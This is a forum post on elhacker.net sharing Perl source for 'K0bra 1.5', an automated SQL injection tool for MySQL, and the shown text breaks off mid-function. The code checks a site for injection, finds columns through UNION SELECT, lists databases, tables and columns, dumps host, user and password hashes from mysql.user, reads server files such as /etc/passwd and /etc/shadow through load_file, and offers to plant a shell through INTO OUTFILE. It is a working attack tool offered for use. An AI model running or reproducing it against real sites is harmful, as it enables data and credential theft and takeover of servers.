elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Introducción a Git (Primera Parte)


+  Foro de elhacker.net
|-+  Programación
| |-+  Scripting
| | |-+  [Perl] K0bra 1.5		0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: [Perl] K0bra 1.5  (Leído 2,153 veces)
BigBear


Desconectado Desconectado

Mensajes: 545



Ver Perfil
[Perl] K0bra 1.5
« en: 1 Diciembre 2011, 22:14 pm »
La nueva version de mi scanner SQLi

Las funciones son las siguientes

  • Comprobar vulnerabilidad
  • Buscar numero de columnas
  • Buscar automaticamente el numero para mostrar datos
  • Mostras tablas
  • Mostrar columnas
  • Mostrar bases de datos
  • Mostrar tablas de otra DB
  • Mostrar columnas de una tabla de otra DB
  • Mostrar usuarios de mysql.user
  • Buscar archivos usando load_file
  • Mostrar un archivo usando load_file
  • Mostrar valores
  • Mostrar informacion sobre la DB
  • Crear una shell usando outfile
  • Todo se guarda en logs ordenados
Código
  1. #!usr/bin/perl
  2. #k0bra 1.5
  3. #Console version
  4. #Automatic SQL Scanner for MYSQL
  5. #(c)0ded By Doddy H
  6.  
  7. system('cls');
  8. system ("title k0bra");
  9.  
  10. my @files =('C:/xampp/htdocs/aca.txt','C:/xampp/htdocs/aca.txt','C:/xampp/htdocs/admin.php','C:/xampp/htdocs/leer.txt','../../../boot.ini','../../../../boot.ini','../../../../../boot.ini','../../../../../../boot.ini','/etc/passwd','/etc/shadow','/etc/shadow~','/etc/hosts','/etc/motd','/etc/apache/apache.conf','/etc/fstab','/etc/apache2/apache2.conf','/etc/apache/httpd.conf','/etc/httpd/conf/httpd.conf','/etc/apache2/httpd.conf','/etc/apache2/sites-available/default','/etc/mysql/my.cnf','/etc/my.cnf','/etc/sysconfig/network-scripts/ifcfg-eth0','/etc/redhat-release','/etc/httpd/conf.d/php.conf','/etc/pam.d/proftpd','/etc/phpmyadmin/config.inc.php','/var/www/config.php','/etc/httpd/logs/error_log','/etc/httpd/logs/error.log','/etc/httpd/logs/access_log','/etc/httpd/logs/access.log','/var/log/apache/error_log','/var/log/apache/error.log','/var/log/apache/access_log','/var/log/apache/access.log','/var/log/apache2/error_log','/var/log/apache2/error.log','/var/log/apache2/access_log','/var/log/apache2/access.log','/var/www/logs/error_log','/var/www/logs/error.log','/var/www/logs/access_log','/var/www/logs/access.log','/usr/local/apache/logs/error_log','/usr/local/apache/logs/error.log','/usr/local/apache/logs/access_log','/usr/local/apache/logs/access.log','/var/log/error_log','/var/log/error.log','/var/log/access_log','/var/log/access.log','/etc/group','/etc/security/group','/etc/security/passwd','/etc/security/user','/etc/security/environ','/etc/security/limits','/usr/lib/security/mkuser.default','/apache/logs/access.log','/apache/logs/error.log','/etc/httpd/logs/acces_log','/etc/httpd/logs/acces.log','/var/log/httpd/access_log','/var/log/httpd/error_log','/apache2/logs/error.log','/apache2/logs/access.log','/logs/error.log','/logs/access.log','/usr/local/apache2/logs/access_log','/usr/local/apache2/logs/access.log','/usr/local/apache2/logs/error_log','/usr/local/apache2/logs/error.log','/var/log/httpd/access.log','/var/log/httpd/error.log','/opt/lampp/logs/access_log','/opt/lampp/logs/error_log','/opt/xampp/logs/access_log','/opt/xampp/logs/error_log','/opt/lampp/logs/access.log','/opt/lampp/logs/error.log','/opt/xampp/logs/access.log','/opt/xampp/logs/error.log','C:\ProgramFiles\ApacheGroup\Apache\logs\access.log','C:\ProgramFiles\ApacheGroup\Apache\logs\error.log','/usr/local/apache/conf/httpd.conf','/usr/local/apache2/conf/httpd.conf','/etc/apache/conf/httpd.conf','/usr/local/etc/apache/conf/httpd.conf','/usr/local/apache/httpd.conf','/usr/local/apache2/httpd.conf','/usr/local/httpd/conf/httpd.conf','/usr/local/etc/apache2/conf/httpd.conf','/usr/local/etc/httpd/conf/httpd.conf','/usr/apache2/conf/httpd.conf','/usr/apache/conf/httpd.conf','/usr/local/apps/apache2/conf/httpd.conf','/usr/local/apps/apache/conf/httpd.conf','/etc/apache2/conf/httpd.conf','/etc/http/conf/httpd.conf','/etc/httpd/httpd.conf','/etc/http/httpd.conf','/etc/httpd.conf','/opt/apache/conf/httpd.conf','/opt/apache2/conf/httpd.conf','/var/www/conf/httpd.conf','/private/etc/httpd/httpd.conf','/private/etc/httpd/httpd.conf.default','/Volumes/webBackup/opt/apache2/conf/httpd.conf','/Volumes/webBackup/private/etc/httpd/httpd.conf','/Volumes/webBackup/private/etc/httpd/httpd.conf.default','C:\ProgramFiles\ApacheGroup\Apache\conf\httpd.conf','C:\ProgramFiles\ApacheGroup\Apache2\conf\httpd.conf','C:\ProgramFiles\xampp\apache\conf\httpd.conf','/usr/local/php/httpd.conf.php','/usr/local/php4/httpd.conf.php','/usr/local/php5/httpd.conf.php','/usr/local/php/httpd.conf','/usr/local/php4/httpd.conf','/usr/local/php5/httpd.conf','/Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf','/Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf','/Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf','/Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php','/Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php','/Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php','/usr/local/etc/apache/vhosts.conf','/etc/php.ini','/bin/php.ini','/etc/httpd/php.ini','/usr/lib/php.ini','/usr/lib/php/php.ini','/usr/local/etc/php.ini','/usr/local/lib/php.ini','/usr/local/php/lib/php.ini','/usr/local/php4/lib/php.ini','/usr/local/php5/lib/php.ini','/usr/local/apache/conf/php.ini','/etc/php4.4/fcgi/php.ini','/etc/php4/apache/php.ini','/etc/php4/apache2/php.ini','/etc/php5/apache/php.ini','/etc/php5/apache2/php.ini','/etc/php/php.ini','/etc/php/php4/php.ini','/etc/php/apache/php.ini','/etc/php/apache2/php.ini','/web/conf/php.ini','/usr/local/Zend/etc/php.ini','/opt/xampp/etc/php.ini','/var/local/www/conf/php.ini','/etc/php/cgi/php.ini','/etc/php4/cgi/php.ini','/etc/php5/cgi/php.ini','c:\php5\php.ini','c:\php4\php.ini','c:\php\php.ini','c:\PHP\php.ini','c:\WINDOWS\php.ini','c:\WINNT\php.ini','c:\apache\php\php.ini','c:\xampp\apache\bin\php.ini','c:\NetServer\bin\stable\apache\php.ini','c:\home2\bin\stable\apache\php.ini','c:\home\bin\stable\apache\php.ini','/Volumes/Macintosh_HD1/usr/local/php/lib/php.ini','/usr/local/cpanel/logs','/usr/local/cpanel/logs/stats_log','/usr/local/cpanel/logs/access_log','/usr/local/cpanel/logs/error_log','/usr/local/cpanel/logs/license_log','/usr/local/cpanel/logs/login_log','/var/cpanel/cpanel.config','/var/log/mysql/mysql-bin.log','/var/log/mysql.log','/var/log/mysqlderror.log','/var/log/mysql/mysql.log','/var/log/mysql/mysql-slow.log','/var/mysql.log','/var/lib/mysql/my.cnf','C:\ProgramFiles\MySQL\MySQLServer5.0\data\hostname.err','C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql.log','C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql.err','C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql-bin.log','C:\ProgramFiles\MySQL\data\hostname.err','C:\ProgramFiles\MySQL\data\mysql.log','C:\ProgramFiles\MySQL\data\mysql.err','C:\ProgramFiles\MySQL\data\mysql-bin.log','C:\MySQL\data\hostname.err','C:\MySQL\data\mysql.log','C:\MySQL\data\mysql.err','C:\MySQL\data\mysql-bin.log','C:\ProgramFiles\MySQL\MySQLServer5.0\my.ini','C:\ProgramFiles\MySQL\MySQLServer5.0\my.cnf','C:\ProgramFiles\MySQL\my.ini','C:\ProgramFiles\MySQL\my.cnf','C:\MySQL\my.ini','C:\MySQL\my.cnf','/etc/logrotate.d/proftpd','/www/logs/proftpd.system.log','/var/log/proftpd','/etc/proftp.conf','/etc/protpd/proftpd.conf','/etc/vhcs2/proftpd/proftpd.conf','/etc/proftpd/modules.conf','/var/log/vsftpd.log','/etc/vsftpd.chroot_list','/etc/logrotate.d/vsftpd.log','/etc/vsftpd/vsftpd.conf','/etc/vsftpd.conf','/etc/chrootUsers','/var/log/xferlog','/var/adm/log/xferlog','/etc/wu-ftpd/ftpaccess','/etc/wu-ftpd/ftphosts','/etc/wu-ftpd/ftpusers','/usr/sbin/pure-config.pl','/usr/etc/pure-ftpd.conf','/etc/pure-ftpd/pure-ftpd.conf','/usr/local/etc/pure-ftpd.conf','/usr/local/etc/pureftpd.pdb','/usr/local/pureftpd/etc/pureftpd.pdb','/usr/local/pureftpd/sbin/pure-config.pl','/usr/local/pureftpd/etc/pure-ftpd.conf','/etc/pure-ftpd/pure-ftpd.pdb','/etc/pureftpd.pdb','/etc/pureftpd.passwd','/etc/pure-ftpd/pureftpd.pdb','/var/log/pure-ftpd/pure-ftpd.log','/logs/pure-ftpd.log','/var/log/pureftpd.log','/var/log/ftp-proxy/ftp-proxy.log','/var/log/ftp-proxy','/var/log/ftplog','/etc/logrotate.d/ftp','/etc/ftpchroot','/etc/ftphosts','/var/log/exim_mainlog','/var/log/exim/mainlog','/var/log/maillog','/var/log/exim_paniclog','/var/log/exim/paniclog','/var/log/exim/rejectlog','/var/log/exim_rejectlog');
  11.  
  12. use LWP::UserAgent;
  13. use URI::Split qw(uri_split);
  14.  
  15. installer();
  16.  
  17. my $nave = LWP::UserAgent->new();
  18. $nave->timeout(5);
  19. $nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");
  20.  
  21. &head;
  22. unless(@ARGV == 2) {
  23. &menu;
  24. } else {
  25. &scan($ARGV[0],$ARVG[1]);
  26. }
  27. &finish;
  28.  
  29. sub menu {
  30. print "[Page] : ";
  31. chomp(my $page=<STDIN>);
  32. print "\n[Bypass : -- /* %20] : ";
  33. chomp(my $bypass = <STDIN>);
  34. print "\n\n";
  35. &scan($page,$bypass);
  36. }
  37.  
  38. sub scan {
  39. my $page = $_[0];
  40. print "[Status] : Scanning.....\n";
  41. ($pass1,$bypass2) = &bypass($_[1]);
  42. my ($scheme, $auth, $path, $query, $frag)  = uri_split($_[0]);
  43. my $save = $auth;
  44.  
  45. if ($_[0]=~/hackman/ig) {
  46. savefile($save.".txt","\n[Target Confirmed] : $_[0]\n");
  47. &menu_options($_[0],$pass,$save);
  48. }
  49.  
  50. my $testar1 = toma($page.$pass1."and".$pass1."1=0".$pass2);
  51. my $testar2 = toma($page.$pass1."and".$pass1."1=1".$pass2);
  52.  
  53. unless ($testar1 eq $testar2) {
  54. motor($page,$_[1]);
  55. } else {
  56. print "\n[-] Not vulnerable\n\n";
  57. print "[+] Scan anyway y/n : ";
  58. chomp(my $op = <stdin>);
  59. if ($op eq "y") {
  60. motor($page,$_[1]);
  61. } else {
  62. head();
  63. menu();
  64. }
  65. }
  66.  
  67. }
  68.  
  69. sub motor {
  70.  
  71. my ($gen,$save,$control) = &length($_[0],$_[1]);
  72.  
  73. if ($control eq 1) {
  74. print "[Status] : Enjoy the menu\n\n";
  75. &menu_options($gen,$pass,$save);
  76. } else {
  77. print "[Status] : Length columns not found\n\n";
  78. <STDIN>;
  79. &head;
  80. &menu;
  81. }
  82. }
  83.  
  84. sub head {
  85. system 'cls';
  87.  
  88.  
  89.  @      @@   @             
  90. @@     @  @ @@             
  91.  @ @@  @  @  @ @   @ @ @@@ 
  92.  @ @   @  @  @@ @ @@@ @  @ 
  93.  @@    @  @  @  @  @   @@@ 
  94.  @ @   @  @  @  @  @  @  @ 
  95. @@@ @   @@   @@@  @@@ @@@@@
  96.  
  97.  
  98.  
  99.  
  100. );
  101. }
  102.  
  103. sub length {
  104. print "\n[+] Looking for the number of columns\n\n";
  105. my $rows  = "0";
  106. my $asc;
  107. my $page = $_[0];
  108. ($pass1,$pass2) = &bypass($_[1]);
  109.  
  110. $alert = "char(".ascii("RATSXPDOWN1RATSXPDOWN").")";
  111. $total = "1";
  112. for my $rows(2..200) {
  113. $asc.= ","."char(".ascii("RATSXPDOWN".$rows."RATSXPDOWN").")"; 
  114. $total.= ",".$rows;
  115. $injection = $page."1".$pass1."and".$pass1."1=0".$pass1."union".$pass1."select".$pass1.$alert.$asc;
  116. $test = toma($injection);
  117. if ($test=~/RATSXPDOWN/) {
  118. @number = $test =~m{RATSXPDOWN(\d+)RATSXPDOWN}g;
  119. $control = 1;
  120. my ($scheme, $auth, $path, $query, $frag)  = uri_split($_[0]);
  121. my $save = $auth;
  122. savefile($save.".txt","\n[Target confirmed] : $page");
  123. savefile($save.".txt","[Bypass] : $_[1]\n");
  124. savefile($save.".txt","[Limit] : The site has $rows columns");
  125. savefile($save.".txt","[Data] : The number @number print data");
  126. $total=~s/$number[0]/hackman/;
  127. savefile($save.".txt","[SQLI] : ".$page."1".$pass1."and".$pass1."1=0".$pass1."union".$pass1."select".$pass1.$total);
  128. return($page."1".$pass1."and".$pass1."1=0".$pass1."union".$pass1."select".$pass1.$total,$save,$control);
  129. }
  130. }
  131. }
  132.  
  133. sub details {
  134. my ($page,$bypass,$save) = @_;
  135. ($pass1,$pass2) = &bypass($bypass);
  136. savefile($save.".txt","\n");
  137. if ($page=~/(.*)hackman(.*)/ig) {
  138. print "[+] Searching information..\n\n"; 
  139. my  ($start,$end) = ($1,$2);
  140. $inforschema = $start."unhex(hex(concat(char(69,82,84,79,82,56,53,52))))".$end.$pass1."from".$pass1."information_schema.tables".$pass2;
  141. $mysqluser = $start."unhex(hex(concat(char(69,82,84,79,82,56,53,52))))".$end.$pass1."from".$pass1."mysql.user".$pass2;
  142. $test3 = toma($start."unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(0x2f6574632f706173737764))))".$end.$pass2);
  143. $test1 = toma($inforschema);
  144. $test2 = toma($mysqluser);
  145. if ($test2=~/ERTOR854/ig) {
  146. savefile($save.".txt","[mysql.user] : ON");
  147. print "[mysql.user] : ON\n";
  148. } else {
  149. print "[mysql.user] : OFF\n";
  150. savefile($save.".txt","[mysql.user] : OFF");
  151. }
  152. if ($test1=~/ERTOR854/ig) {
  153. print "[information_schema.tables] : ON\n";
  154. savefile($save.".txt","[information_schema.tables] : ON");
  155. } else {
  156. print "[information_schema.tables] : OFF\n";
  157. savefile($save.".txt","[information_schema.tables] : OFF");
  158. }
  159. if ($test3=~/ERTOR854/ig) {
  160. print "[load_file] : ON\n";
  161. savefile($save.".txt","[load_file] : ".$start."unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(0x2f6574632f706173737764))))".$end.$pass2);
  162. }
  163. $concat = "unhex(hex(concat(char(69,82,84,79,82,56,53,52),version(),char(69,82,84,79,82,56,53,52),database(),char(69,82,84,79,82,56,53,52),user(),char(69,82,84,79,82,56,53,52))))"; 
  164. $injection = $start.$concat.$end.$pass2;
  165. $code = toma($injection);
  166. if ($code=~/ERTOR854(.*)ERTOR854(.*)ERTOR854(.*)ERTOR854/g) {
  167. print "\n[!] DB Version : $1\n[!] DB Name : $2\n[!] user_name : $3\n\n";
  168. savefile($save.".txt","\n[!] DB Version : $1\n[!] DB Name : $2\n[!] user_name : $3\n");
  169. } else {
  170. print "\n[-] Not found any data\n";
  171. }
  172. }
  173. }
  174.  
  175. sub menu_options {
  176.  
  177. head();
  178.  
  179. print "[Target confirmed] : $_[0]\n";
  180. print "[Bypass] : $_[1]\n\n";
  181.  
  182. my ($scheme, $auth, $path, $query, $frag)  = uri_split($_[0]);
  183. my $save = $auth;
  184. print "[save] : /logs/webs/$save\n\n";
  185. print "\n--== information_schema.tables ==--\n\n";
  186. print "[1] : Show tables\n";
  187. print "[2] : Show columns\n";
  188. print "[3] : Show DBS\n";
  189. print "[4] : Show tables with other DB\n";
  190. print "[5] : Show columns with other DB\n";
  191. print "\n\n--== mysql.user ==--\n\n";
  192. print "[6] : Show users\n";
  193. print "\n--== Others ==--\n\n";
  194. print "[7] : Fuzzing files with load_file\n";
  195. print "[8] : Read a file with load_file\n";
  196. print "[9] : Dump\n";
  197. print "[10] : Informacion of the server\n";
  198. print "[11] : Create a shell with into outfile\n";
  199. print "[12] : Show Log\n";
  200. print "[13] : Change Target\n";
  201. print "[14] : Exit\n";
  202. print "\n\n[Option] : ";
  203. chomp(my $opcion = <STDIN>);
  204. if ($opcion eq "1") {
  205. schematables($_[0],$_[1],$save);
  206. &reload;	
  207. }
  208. elsif ($opcion eq "2") {
  209. print "\n\n[Table] : ";
  210. chomp(my $tabla = <STDIN>);
  211. schemacolumns($_[0],$_[1],$save,$tabla);
  212. &reload;
  213. }
  214. elsif ($opcion eq "3") {
  215. &schemadb($_[0],$_[1],$save);
  216. &reload;
  217. }
  218. elsif ($opcion eq "4") {
  219. print "\n\n[DAtabase] : ";
  220. chomp(my $data =<STDIN>);
  221. &schematablesdb($_[0],$_[1],$data,$save);
  222. &reload;
  223. }
  224. elsif ($opcion eq "5"){
  225. print "\n\n[DB] : ";
  226. chomp(my $db =<STDIN>);
  227. print "\n[Table] : ";
  228. chomp(my $table =<STDIN>);
  229. &schemacolumnsdb($_[0],$_[1],$db,$table,$save);
  230. &reload;
  231. }
  232. elsif ($opcion eq "6") {
  233. &mysqluser($_[0],$_[1],$save);
  234. &reload;
  235. }
  236. elsif ($opcion eq "7") {
  237. &load($_[0],$_[1],$save);
  238. &reload;
  239. }
  240. elsif ($opcion eq "8") { ########################################
  241. &loadfile($_[0],$_[1],$save);
  242. &reload;
  243. }
  244. elsif ($opcion eq "9") {
  245. print "\n\n[Table to dump] : ";
  246. chomp(my $tabla = <STDIN>);
  247. print "\n[Column 1] : ";
  248. chomp(my $col1 = <STDIN>);
  249. print "\n[Column 2] : ";
  250. chomp(my $col2 = <STDIN>);
  251. print "\n\n";
  252. &dump($_[0],$col1,$col2,$tabla,$_[1],$save);
  253. &reload;
  254. }
  255. elsif ($opcion eq "10") {
  256. print "\n\n";
  257. &details($_[0],$_[1],$save);
  258. &reload;
  259. }
  260. elsif ($opcion eq "11") {
  261. print "\n\n[Full Path Discloure] : ";
  262. chomp(my $path = <STDIN>);
  263. &into($_[0],$_[1],$path,$save);
  264. &reload;
  265. }
  266. elsif ($opcion eq "12") {
  267. $t = "logs/webs/$save.txt";
  268. system("start $t");
  269. &reload;
  270. }
  271. elsif ($opcion eq "13") {
  272. &head;
  273. &menu;
  274. }
  275.  
  276. elsif ($opcion eq "14") {
  277. &finish;
  278. }
  279. else {
  280. &reload;
  281. }
  282. }
  283.  
  284. sub schematables {
  285.  
  286. $real = "1";
  287. my ($page,$bypass,$save) = @_;
  288. savefile($save.".txt","\n");
  289. print "\n";
  290. my $page1 = $page;
  291. ($pass1,$pass2) = &bypass($_[1]);
  292. savefile($save.".txt","[DB] : default");
  293. print "\n[+] Searching tables with schema\n\n";
  294. $page =~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),table_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
  295. $page1=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
  296. $code = toma($page1.$pass1."from".$pass1."information_schema.tables".$pass2);
  297. if ($code=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) { 
  298. my $resto = $1;
  299. $total = $resto - 17; 
  300. print "[+] Tables Length :  $total\n\n";
  301. savefile($save.".txt","[+] Searching tables with schema\n");
  302. savefile($save.".txt","[+] Tables Length :  $total\n");
  303. my $limit = $1;
  304. for my $limit(17..$limit) {
  305. $code1 = toma($page.$pass1."from".$pass1."information_schema.tables".$pass1."limit".$pass1.$limit.",1".$pass2);
  306. if ($code1 =~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
  307. my $table = $1;
  308. chomp $table;
  309. print "[Table $real Found : $table ]\n";
  310. savefile($save.".txt","[Table $real Found : $table ]");
  311. $real++;
  312. }}
  313. } else {
  314. print "\n[-] information_schema = ERROR\n";
  315. }	 
  316. }
  317. sub reload {
  318. print "\n\n[+] Finish\n\n";
  319. <STDIN>;
  320. &head;
  321. &menu_options;
  322. }
  323.  
  324.  
  325. sub schemacolumns {
  326. my ($page,$bypass,$save,$table) = @_;
  327. my $page3 = $page;
  328. my $page4 = $page;
  329. savefile($save.".txt","\n");
  330. print "\n";
  331. ($pass1,$pass2) = &bypass($bypass);
  332. print "\n[DB] : default\n";
  333. savefile($save.".txt","[DB] : default");
  334. savefile($save.".txt","[Table] : $table\n");
  335. $page3=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
  336. $code3 = toma($page3.$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name=char(".ascii($table).")".$pass2);
  337. if ($code3=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
  338. print "\n[Columns Length : $1 ]\n\n";
  339. savefile($save.".txt","[Columns Length : $1 ]\n");
  340. my $si = $1;
  341. chomp $si;
  342. $page4=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),column_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
  343. $real = "1";
  344. for my $limit2(0..$si) {
  345. $code4 = toma($page4.$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name=char(".ascii($table).")".$pass1."limit".$pass1.$limit2.",1".$pass2);
  346. if ($code4=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) { 
  347. print "[Column $real] : $1\n"; 
  348. savefile($save.".txt","[Column $real] : $1");
  349. $real++;
  350. }}
  351. } else {
  352. print "\n[-] information_schema = ERROR\n";
  353. }}
  354.  
  355. sub schemadb {
  356. my ($page,$bypass,$save) = @_;
  357. my $page1 = $page;
  358. savefile($save.".txt","\n");
  359. print "\n\n[+] Searching DBS\n\n";
  360. ($pass1,$pass2) = &bypass($bypass);
  361. $page=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
  362. $code = toma($page.$pass1."from".$pass1."information_schema.schemata");
  363. if ($code=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
  364. my $limita = $1;
  365. print "[+] Databases Length : $limita\n\n";
  366. savefile($save.".txt","[+] Databases Length : $limita\n");
  367. $page1=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),schema_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
  368. $real = "1";
  369. for my $limit(0..$limita) {
  370. $code = toma($page1.$pass1."from".$pass1."information_schema.schemata".$pass1."limit".$pass1.$limit.",1".$pass2);
  371. if ($code=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
  372. my $control = $1;
  373. if ($control ne "information_schema" and $control ne "mysql" and $control ne "phpmyadmin") {
  374. print "[Database $real Found] $control\n";
  375. savefile($save.".txt","[Database $real Found] : $control");
  376. $real++;
  377. }
  378. }
  379. }
  380. } else {
  381. print "[-] information_schema = ERROR\n";
  382. }
  383. }
  384.  
  385. sub schematablesdb {
  386. my $page = $_[0];
  387. my $db = $_[2];
  388. my $page1 = $page;
  389. savefile($_[3].".txt","\n");
  390. print "\n\n[+] Searching tables with DB $db\n\n";
  391. ($pass1,$pass2) = &bypass($_[1]);
  392. savefile($_[3].".txt","[DB] : $db");
  393. $page =~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),table_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
  394. $page1=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
  395. $code = toma($page1.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass2);
  396. #print $page.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass2."\n";
  397. if ($code=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {  
  398. print "[+] Tables Length :  $1\n\n";
  399. savefile($_[3].".txt","[+] Tables Length :  $1\n");
  400. my $limit = $1;
  401. $real = "1";
  402. for my $lim(0..$limit) {
  403. $code1 = toma($page.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass1."limit".$pass1.$lim.",1".$pass2);
  404. #print $page.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass1."limit".$pass1.$lim.",1".$pass2."\n";
  405. if ($code1 =~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
  406. my $table = $1;
  407. chomp $table;
  408. savefile($_[3].".txt","[Table $real Found : $table ]");
  409. print "[Table $real Found : $table ]\n";
  410. $real++;
  411. }}
  412. } else {
  413. print "\n[-] information_schema = ERROR\n";
  414. }}
  415.  
  416. sub schemacolumnsdb {
  417. my ($page,$bypass,$db,$table,$save) = @_;
  418. my $page3 = $page;
  419. my $page4 = $page;
  420. print "\n\n[+] Searching columns in table $table with DB $db\n\n";
  421. savefile($save.".txt","\n");
  422. ($pass1,$pass2) = &bypass($_[1]);
  423. savefile($save.".txt","\n[DB] : $db");
  424. savefile($save.".txt","[Table] : $table");
  425. $page3=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
  426. $code3 = toma($page3.$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name=char(".ascii($table).")".$pass1."and".$pass1."table_schema=char(".ascii($db).")".$pass2);
  427. if ($code3=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
  428. print "\n[Columns length : $1 ]\n\n";
  429. savefile($save.".txt","[Columns length : $1 ]\n");
  430. my $si = $1;
  431. chomp $si;
  432. $page4=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),column_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
  433. $real = "1";
  434. for my $limit2(0..$si) {
  435. $code4 = toma($page4.$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name=char(".ascii($table).")".$pass1."and".$pass1."table_schema=char(".ascii($db).")".$pass1."limit".$pass1.$limit2.",1".$pass2);
  436. if ($code4=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) { 
  437. print "[Column $real] : $1\n";
  438. savefile($save.".txt","[Column $real] : $1");
  439. $real++;
  440. }
  441. }
  442. } else {
  443. print "\n[-] information_schema = ERROR\n";
  444. }
  445. }
  446.  
  447. sub mysqluser {
  448. my ($page,$bypass,$save) = @_;
  449. my $cop = $page;
  450. my $cop1 = $page;
  451. savefile($save.".txt","\n");
  452. print "\n\n[+] Finding mysql.users\n";
  453. ($pass1,$pass2) = &bypass($bypass);
  454. $page =~s/hackman/concat(char(82,65,84,83,88,80,68,79,87,78,49))/;
  455. $code = toma($page.$pass1."from".$pass1."mysql.user".$pass2);
  456. if ($code=~/RATSXPDOWN/ig){
  457. $cop1 =~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
  458. $code1 = toma($cop1.$pass1."from".$pass1."mysql.user".$pass2);
  459. if ($code1=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
  460. print "\n\n[+] Users Found : $1\n\n";
  461. savefile($save.".txt","\n[+] Users mysql Found : $1\n");
  462. for my $limit(0..$1) { 
  463. $cop =~s/hackman/unhex(hex(concat(0x524154535850444f574e,Host,0x524154535850444f574e,User,0x524154535850444f574e,Password,0x524154535850444f574e)))/;
  464. $code = toma($cop.$pass1."from".$pass1."mysql.user".$pass1."limit".$pass1.$limit.",1".$pass2);
  465. if ($code=~/RATSXPDOWN(.*)RATSXPDOWN(.*)RATSXPDOWN(.*)RATSXPDOWN/ig) {
  466. print "[Host] : $1 [User] : $2 [Password] : $3\n";
  467. savefile($save.".txt","[Host] : $1 [User] : $2 [Password] : $3");
  468. } else {
  469. &reload;
  470. }
  471. }
  472. }
  473. } else {
  474. print "\n[-] mysql.user = ERROR\n";
  475. }
  476. }
  477.  
  478. sub tabfuzz {
  479. my $page = $_[0];
  480. ($pass1,$pass2) = &bypass($_[1]);
  481. $count = "0";
  482. savefile($_[2].".txt","\n");
  483. print "\n";
  484. if ($_[0] =~/(.*)hackman(.*)/g) {
  485. my $start = $1; my $end = $2;
  486. print "\n\n[+] Searching tables.....\n\n";
  487. for my $table(@buscar2) {
  488. chomp $table;
  489. $concat = "unhex(hex(concat(char(69,82,84,79,82,56,53,52))))";
  490. $injection = $start.$concat.$end.$pass1."from".$pass1.$table.$pass2;
  491. $code = toma($injection);
  492. if ($code =~/ERTOR854/g) {
  493. $count++; 
  494. print "[Table Found] : $table\n";
  495. savefile($_[2].".txt","[Table Found] : $table");
  496. }}}
  497. if ($count eq "0") { print "[-] Not found any table\n";
  498. &reload;
  499. }
  500. }
  501.  
  502. sub colfuzz {
  503. my $page = $_[0];
  504. ($pass1,$pass2) = &bypass($_[1]);
  505. $count = "0";
  506. savefile($_[3].".txt","\n");
  507. print "\n";
  508. if ($_[0] =~/(.*)hackman(.*)/) { 
  509. my $start = $1; my $end = $2;
  510. print "[+] Searching columns for the table $_[2]...\n\n";
  511. savefile($_[3].".txt","[Table] : $_[2]");
  512. for my $columns(@buscar1) {
  513. chomp $columns;
  514. $concat = "unhex(hex(concat(char(69,82,84,79,82,56,53,52),$columns,char(69,82,84,79,82,56,53,52))))";
  515. $code = toma($start.$concat.$end.$pass1."from".$pass1.$_[2].$pass2);
  516. if ($code =~/ERTOR854/g) {
  517. print "[Column] : $columns\n";
